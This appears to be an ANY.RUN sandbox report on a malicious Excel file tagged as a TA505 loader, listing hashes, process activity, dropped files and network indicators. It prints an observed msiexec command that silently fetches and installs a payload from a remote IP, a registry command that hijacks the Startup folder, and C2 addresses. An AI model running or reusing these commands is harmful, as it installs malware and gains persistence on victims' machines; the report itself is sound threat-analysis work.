analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2547A0A4_Factura_FMC4567_20190424.xls

Full analysis: https://app.any.run/tasks/d82380ae-f832-4a25-ae20-51830e6c24b3
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 25, 2019, 16:29:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
exe-to-msi
ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Wed Apr 24 15:31:30 2019, Security: 0
MD5:

5881373811FCCA6E422385F317145916

SHA1:

9F4FCF622FE01AD21F89F81A735EA9137A7537E7

SHA256:

C45C0DD7171D9618F95323E5EF06A5E0C89F363A9C14680CB4B4AE9DB363700C

SSDEEP:

3072:+Kpb8rGYrMPelwhKmFV5xtezEsgrdgaeEQSNfzAKAn8CsENt:+Kpb8rGYrMPelwhKmFV5xtuEsgrdgaHs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 3852)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3852)
    • Changes the Startup folder

      • REG.exe (PID: 2728)
    • Downloads executable files from IP

      • msiexec.exe (PID: 4016)
    • Application was dropped or rewritten from another process

      • cmualrc.exe (PID: 2552)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 4016)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 4016)
      • MSI39EC.tmp (PID: 3200)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 4016)
    • Uses REG.EXE to modify Windows registry

      • cmualrc.exe (PID: 2552)
    • Creates files in the program directory

      • MSI39EC.tmp (PID: 3200)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3852)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 4016)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 4016)
    • Application was dropped or rewritten from another process

      • MSI39EC.tmp (PID: 3200)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

HeadingPairs:
  • Листы
  • 2
  • Макросы Excel 4.0
  • 2
TitleOfParts:
  • 4
  • OOOO
  • 2
  • 3
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: Microsoft Corporation
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2019:04:24 14:31:30
CreateDate: 2018:12:19 10:42:12
Software: Microsoft Excel
LastModifiedBy: 1
Author: Microsoft Office
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msi39ec.tmp cmualrc.exe reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
3852"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
2168msiexec.exe STOP=1 /i http://109.234.38.177/dom4 /q ksw='%TEMP%' C:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
4016C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3200"C:\Windows\Installer\MSI39EC.tmp"C:\Windows\Installer\MSI39EC.tmp
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2552c:\programdata\f64a428dfd\cmualrc.exec:\programdata\f64a428dfd\cmualrc.exe
MSI39EC.tmp
User:
admin
Integrity Level:
MEDIUM
2728REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\f64a428dfdC:\Windows\system32\REG.exe
cmualrc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
711
Read events
648
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
1
Text files
9
Unknown types
3

Dropped files

PID
Process
Filename
Type
3852EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR2D56.tmp.cvr
MD5:
SHA256:
4016msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFC1C66F5782B322A9.TMP
MD5:
SHA256:
4016msiexec.exeC:\Windows\Installer\MSI390F.tmp
MD5:
SHA256:
4016msiexec.exeC:\Windows\Installer\MSI39EC.tmp
MD5:
SHA256:
3200MSI39EC.tmpC:\ProgramData\0
MD5:
SHA256:
3200MSI39EC.tmpC:\programdata\f64a428dfd\cmualrc.exe:Zone.Identifier
MD5:
SHA256:
4016msiexec.exeC:\Config.Msi\113884.rbs
MD5:
SHA256:
2552cmualrc.exeC:\ProgramData\0
MD5:
SHA256:
4016msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFD22E9F3C2A6A4862.TMP
MD5:
SHA256:
4016msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:7764E381A49AD29966E4326532D5FB38
SHA256:228E0AB967C792B1ACB09C69B6A3EDE06277646A99AF5CE200F85729A08B50EB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4016
msiexec.exe
GET
200
109.234.38.177:80
http://109.234.38.177/dom4
RU
executable
172 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2552
cmualrc.exe
92.86.0.85:80
gohaiendo.com
Telekom Romania Communication S.A
RO
suspicious
4016
msiexec.exe
109.234.38.177:80
Webzilla B.V.
RU
suspicious

DNS requests

Domain
IP
Reputation
gohaiendo.com
  • 92.86.0.85
  • 82.208.161.228
  • 197.157.216.75
  • 151.251.23.210
  • 95.158.162.200
  • 77.70.100.139
  • 84.3.89.29
  • 87.241.136.1
  • 37.34.176.37
  • 81.12.175.59
malicious

Threats

PID
Process
Class
Message
4016
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
4016
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
1 ETPRO signatures available at the full report
No debug info